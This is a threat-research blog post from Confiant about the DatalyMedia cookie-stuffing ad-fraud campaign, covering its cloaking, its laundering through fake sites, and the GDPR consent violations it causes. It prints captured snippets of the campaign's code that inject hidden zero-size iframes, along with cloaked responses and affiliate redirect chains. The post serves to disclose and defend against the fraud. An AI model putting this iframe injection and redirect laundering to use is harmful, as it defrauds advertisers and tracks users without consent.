Confiant’s broad coverage in ad tech gives us visibility on some of the darkest corners of the ecosystem. We are strong believers that to truly fight malvertisers, we have to understand their motives. Sometimes this brings us to researching some long standing and large scale (but neglected) attacks. While ad fraud is not normally our core focus at Confiant, we are always invested in exposing how threat actors use the programmatic process and ad networks for malicious purposes. Confiant has observed a cookie stuffing campaign running across multiple programmatic ad platforms with a specific uptick in Q4 around Black Friday. We refer to the actor behind this campaign as DatalyMedia, based on one of the legal entities they operate.
What is cookie stuffing?
Cookie stuffing is a form of ad fraud where the malicious campaign triggers arbitrary numbers of invalid ad conversions by generating fake clicks. Cookie stuffing can target cost-per-click (CPC) ad campaigns and various types of cost-per-lead (CPL) and cost-per-action (CPA) campaigns. Cookie stuffing is a source of invalid traffic (IVT) i.e.: ad fraud.
The common way to generate these fake clicks is to surreptitiously load click URLs in hidden iframes inside the ad as it renders.
Risks of cookie stuffing
For advertisers: Cookie stuffing skews targeted data and degrades campaign performance
For publishers: Cookie stuffing causes significant page latency due to massive network load when advertising landing pages load in hidden iframes
For both:
• Lack of user consent for the rogue tracking / privacy compliance violations create liabilities
• Fake conversions from cookie stuffing steal money from the ad ecosystem
According to our internal data, DatalyMedia has been specializing in affiliate marketing fraud (by executing cookie stuffing schemes) since at least 2015. Much of the infrastructure, tactics and techniques employed have remained rather stable over time.
We have identified four legal entities who have been involved in the DatalyMedia cookie stuffing scheme:
• Just Media Group (fka JustClick Media)
• Dataly Media
• Eficads
• Tredia Solutions
In addition to the techniques presented below, DatalyMedia has been observed using various tactics to maintain its presence in the ad tech ecosystem:
• Creating many ad serving domains — over a hundred since inception. A full list of IOCs is presented in the appendix.
• Partnering with many ad platforms: DatalyMedia has been active on at least 4 different advertising demand side platforms (DSPs) in 2022.
• Inquiring to ad security vendors about the status of their domains claiming legitimate needs
Technical Analysis / Cloaking
To circumvent detection, DatalyMedia leverages cloaking.
Script Execution Flow
The script that DatalyMedia executes has a cloaking component that conditionally loads one or multiple hidden iframes.
GET
https://dugqz5bb8j.execute-api.eu-west-2.amazonaws.com/t/get/
RVKTdRpig1AgtgNXoDRQd46L?mmid=1&siteId=276777&referrer=https://
www.google.com/&exchange=cas&siteUrl=www.voici.fr&strategy=12607048&
campaignId=1245138&creativeId=8521972&rn=4048973770536923350
If the cloaking test is not passed successfully, the iframe is replaced with an empty image:
if(document.getElementById("RVKTdRpig1AgtgNXoDRQd46L"))
document.getElementById("RVKTdRpig1AgtgNXoDRQd46L")
.insertAdjacentHTML('beforeend',
'<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///
wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" style="position: relative;
top: 0; left: 0;">');
When cloaking is passed, the iframe URL then redirects to a secondary domain (theblueaffiliate.net), itself equipped with similar cloaking (likely to prevent third-parties from replaying the chain without knowledge of the targeting details):
if(document.getElementById("RVKTdRpig1AgtgNXoDRQd46L"))
document.getElementById("RVKTdRpig1AgtgNXoDRQd46L" )
.insertAdjacentHTML('beforeend',
'<iframe src="https://dugqz5bb8j.execute-api.eu-west-2.amazonaws.com/
t/trk/RVKTdRpig1AgtgNXoDRQd46L/?c2=true&campaignId=1245138&
creativeId=8521972&exchange=cas&mmid=1&
referrer=https%3A%2F%2Fwww.google.com%2F&rn=4048973770536923350&
siteId=276777&siteUrl=www.voici.fr&strategy=12607048" width="0" height="0"
scrolling="no" frameborder="0" framespacing="0"
sandbox="allow-scripts allow-forms allow-pointer-lock allow-same-origin"
style="position: relative; top: 0; left: 0;"></iframe>');
Script Execution Output
We see how the HTML is rendered for each instance.
GET
https://lnk.theblueaffiliate.net/trk/RVKTdRpig1AgtgNXoDRQd46L?
c2=true&campaignId=1245138&creativeId=8521972&exchange=cas&mmid=1&
referrer=https://www.google.com/&rn=4048973770536923350&siteId=276777&
siteUrl=www.voici.fr&strategy=12607048
Cloaking not passed, an empty image is loaded:
<!DOCTYPE HTML>
<html>
<head>
<title></title>
<link rel="icon" type="image/gif" href="data:image/gif;base64,
R0lGODlhAQABAPAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=="/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="robots" content="noindex, nofollow"/>
</head>
<body>
<img src="https://lnk.theblueaffiliate.net/img/pix.jpg" />
</body>
</html>
Cloaking passed:
<!DOCTYPE HTML>
<html>
<head>
<title></title>
<link rel="icon" type="image/gif" href="data:image/gif;base64,
R0lGODlhAQABAPAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=="/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="robots" content="noindex, nofollow"/>
</head>
<body>
<div data-trkDelay="5000">
<div class="frame"
data-val="https://lnk.theblueaffiliate.net?
bt=lnk.thebigadsstore.com&
ref=https%3A%2F%2Fwww.tudn.mx%2F&friend=&
u=perf.af.datatechads.com%252Fts%252Fi5047728%252Ftsc%253Ftyp%253Dr
%2526amc%253Daff.eficads.373016.506668.CRT3CYjXlY2%2526smc1
%253D636ebe2d0817d25eae5611ae-RL-259754%2526smc5
%253Dlnk.thebigadsstore.com%25252Fref%25252Fwww.tudn.mx%25252F&
log=false&type=ROTATOR_LINK&linkId=259754&
clickId=636ebe2d0817d25eae5611ae&br=false"
data-sb="allow-scripts allow-forms allow-pointer-lock
allow-same-origin"
data-refIframe="false"
data-refreshUrl="https://www.elektra.mx/colchones%20matrimoniales%20
spring%20air?utm_source=Afiliados&utm_medium=Eficads&
utm_campaign=Descuentos-M%C3%A1ximos-Mensuales__&utm_term=
DisplayAd&utm_source=Afiliados&utm_medium=Eficads&
utm_campaign=Descuentos-M%C3%A1ximos-Mensuales__&
utm_term=DisplayAd"
data-pv="20" data-vt="15" data-gid="UA-3164251-1"
data-pt="colchones matrimoniales spring air - Elektra en Línea"
data-ptconfig="{"cs":"Tredia","cc":
"259754","ck":37766,"cm":"
Eficads","cn":"Elektra Colchones","
tid":"UA-207019490-1"}">
</div>
<script src="https://lnk.theblueaffiliate.net/js/c.js"></script>
</div>
</body>
</html>
If cloaking passes, the script at https://lnk.theblueaffiliate.net/js/c.js waits 5 seconds (another precaution to avoid detection) then loads the URLs provided in the data-val parameter inside iframes. This causes the advertiser URLs to load as if the user had clicked it along with DatalyMedia’s click tracker (perf.af.datatechads.com). For example:
https://perf.af.datatechads.com/ts/i5047728/tsc?typ=r&
amc=aff.eficads.373016.506668.CRT3CYjXlY2&smc1=636ebe2d0817d25eae5611ae-RL-
259754&smc5=lnk.thebigadsstore.com%2Fref%2Fwww.tudn.mx%2F
=>
https://www.elektra.mx/colchones%20matrimoniales%20spring%20air?
_q=colchones%20matrimoniales%20spring%20air&map=ft?
cmpid=Afiliados:Eficads:DescuentosM%C3%A1ximosMensuales:Performance:
DisplayAd:EKT-HOG-COL::Na-Cluster&utm_source=Afiliados&
utm_medium=Eficads&utm_campaign=Descuentos-M%C3%A1ximos-Mensuales__&
utm_term=DisplayAd&utm_source=Afiliados&utm_medium=Eficads&
utm_campaign=Descuentos-M%C3%A1ximos-Mensuales__&utm_term=DisplayAd
Elektra’s whole website is now loading as a hidden iframe in the ad, conversion trackers and all.
Laundering via network of fake sites
The Players+---------------------+---------------------------------------------------+
| Publisher A | One of the numerous publishers serving |
| | programmatic ads and exposed to DatalyMedia's |
| | cookie stuffing scheme |
+---------------------+---------------------------------------------------+
| Brand X | One of the numerous brands running performance |
| | marketing campaigns via DatalyMedia (directly |
| | or indirectly) |
+---------------------+---------------------------------------------------+
| Bad Publisher B | One of the numerous publishers operated by |
| | DatalyMedia to launder fake conversions |
+---------------------+---------------------------------------------------+
| Publisher C | One of the numerous publishers serving native ads |
| | and unwittingly reating legitimate traffic for |
| | DatalyMedia's Bad Publisher B and others |
+---------------------+---------------------------------------------------+
| Affiliate Network D | An affiliate network incorrectly attributing |
| | conversions to Bad Publisher B. DatalyMedia |
| | DatalyMedia leveraged both third-party networks |
| | as well as their own. |
+---------------------+---------------------------------------------------+
DatalyMedia creates two traffic paths, a “dirty” one (committing fraud) and a “clean” one, with legitimate traffic used for laundering the dirty one.
In the dirty path, DatalyMedia serves display advertisements (programmatic ads render on Publisher A’s website above). These ads use cloaking to hide the cookie stuffing scheme: Full execution of click tracking URLs in an invisible iframe.
Incidentally, the brand represented in the ad creative here is unrelated to the abused brand in the cookie stuffing scheme. E.g. Tommy Hilfiger:
The scheme gets complicated by the use of an intermediary website (Bad Publisher B), which serves to make the conversions look legitimate to the defrauded affiliate networks and brands.
The “dirty” path uses a POST HTTP request to Bad Publisher B while the “clean” path uses a GET request. Let’s review the execution of both paths with an example.
Bad Publisher B as open redirector via POST request
POST https://www.thetop3.com/uk/top-3-unique-gifts-for-your-soulmate/
POST parameters+------------+-------------------------------------------------+
| go | 1 |
+------------+-------------------------------------------------+
| url | www.linkbux.com%2Ftrack%2Fe266uWOnCOlkX6woQD |
| | CFs3dUTD57c2EajL_aOE9LBtEaNMDXGGuaAd0iCEANyHpwo |
| | d2qxgTOd3maDVlg_c%3Furl%3Dhttps%253A%252F%252F |
| | beautyworksonline.com%252F%26uid%3D63523bd1767 |
| | 55c47d5ce7d9f-RL-246703 |
+------------+-------------------------------------------------+
| log | false |
+------------+-------------------------------------------------+
| type | |
+------------+-------------------------------------------------+
| linkId | 246703 |
+------------+-------------------------------------------------+
| clickId | 63523bd176755c47d5ce7d9f |
+-----------+--------------------------------------------------+
Response content:
Redirect chain (still hidden inside invisible iframe):
https://www.linkbux.com/track/e266uWOnCOlkX6woQDCFs3dUTD57c2EajL_aOE9LBtEaNMDXGGuaAd0iCEANyHpwod2qxgTOd3maDVlg_c?url=https%3A%2F%2Fbeautyworksonline.com%2F&uid=63523bd176755c47d5ce7d9f-RL-246703
https://beautyworksonline.com/en_US
Bad Publisher B on click via GET request
GET https://www.thetop3.com/uk/top-3-unique-gifts-for-your-soulmate/
On Click redirect chain:
https://link.thetop3.com/offer/TFgCEu2AtbzRxfAe4QaQKq8B
https://www.linkbux.com/track/e266uWOnCOlkX6woQDCFs3dUTD57c2EajL_aOE9LBtEaNMDXGGuaAd0iCEANyHpwod2qxgTOd3maDVlg_c?url=https%3A%2F%2Fbeautyworksonline.com%2F&uid=63835d5c2ed6d1470b4d899d
https://beautyworksonline.com/en_US
The “clean” path uses native ad networks to create traffic in the style of ad-driven content websites (often called “made for advertising” sites or MFA) but the real purpose here is not to generate ad revenue but to create an audience to support the amount of conversions driven by the “dirty” path.
Traffic generated from the “dirty” path is indistinguishable from the traffic in the “clean” path.
Altogether, we are dealing with a well-oiled traffic laundering machine, effective at generating significant ad fraud revenue.
Privacy compliance
Because landing pages are loaded wholesale in iframes, all the tracking pixels associated with them load in the context of the publisher page. This is the intended behavior for the fraudster.
Critically, this rogue tracking is not covered by consent management platforms (for obvious reasons — the malicious code is cloaked by the cookie stuffer). In our diagram above, Publisher A ends up being liable for the tracking pixels served by Brand X without any user consent.
DatalyMedia and GDPR Compliance+-----------------+-----------------+--------------+
| Country | % of volumes | GDPR Applies |
+-----------------+-----------------+--------------+
| Australia | 22% | No |
+-----------------+-----------------+--------------+
| Italy | 15% | Yes |
+-----------------+-----------------+--------------+
| Great Britain | 13% | Yes |
+-----------------+-----------------+--------------+
| Sweden | 13% | Yes |
+-----------------+-----------------+--------------+
| Norway | 8% | Yes |
+-----------------+-----------------+--------------+
| Belgium | 8% | Yes |
+-----------------+-----------------+--------------+
| Finland | 7% | Yes |
+-----------------+-----------------+--------------+
| Netherlands | 5% | Yes |
+-----------------+-----------------+--------------+
| Germany | 5% | Yes |
+-----------------+-----------------+--------------+
| Spain | 1% | Yes |
+-----------------+-----------------+--------------+
| France | 1% | Yes |
+-----------------+-----------------+--------------+
| Poland | 1% | Yes |
+-----------------+-----------------+--------------+
| United States | 1% | No |
+-----------------+-----------------+--------------+
| Other | 1% | No |
+-----------------+-----------------+--------------+
Confiant data shows that 76% of cookie stuffing ads served by DatalyMedia in 2022 were targeting European countries (where the GDPR applies).
In an example presented below and reproduced in the Netherlands, although the user granted consent to all declared vendors (according to the corresponding TCF consent string we analyzed), DatalyMedia initiated a hidden ad call to TradeTracker (an affiliate network) which dropped a tracking cookie. Since TradeTracker is not registered as a vendor under TCF, it did not obtain consent from the user and was not permitted to collect personal information.
Ironically, DatalyMedia is registered in the TCF Global Vendor List (GVL) under “Tredia Solutions” with only a handful of known DatalyMedia domains declared in their device storage disclosure (at https://www.tredia.media/deviceStorageDisclosure.json). A long list of domains remains undeclared (see indicators in Appendix).
Cookie stuffing is inherently hostile to privacy rights and this registration only creates an appearance of compliance. While the IAB Europe (the organization that manages TCF) thanked us for reporting the issue, they have not communicated any outcome resulting from this research.
Volumes
By extrapolating internal Confiant data, we estimate that DatalyMedia served approximately 125 million display ad impressions in 2022.
DatalyMedia has had a highly seasonal activity over 2022, with 3 major periods of activity: Winter, Summer and Fall, and an all-time peak on Black Friday — November 25, with a volume of over 9x their daily 2022 average. This is hardly surprising, as DatalyMedia is inherently a performance marketing shop.
Conclusion
Cookie stuffing (and more broadly pixel stuffing) sits at the intersection of different interests and focuses: malvertising, ad traffic misrepresentation, affiliate marketing fraud. The lack of industry focus on this issue has allowed these fraudsters to thrive — specifically in the case of DatalyMedia for a mind-blowing 8 years. More broadly, cookie/pixel stuffing continues to be a large money maker for Adware/malware campaigns.
About Confiant
Confiant is the cybersecurity industry-leader for ad tech — specializing in detecting and stopping online attacks as they happen. Since 2013, our mission has been to protect online users and organizations of all sizes. Our platform oversees trillions of ad transactions and detects millions of malicious events, every month.
Appendix A
Indicators of Compromise
Source: https://blog.confiant.com/malvertiser-makes-the-big-bucks-on-black-friday-637922cd5865
No tags for this post.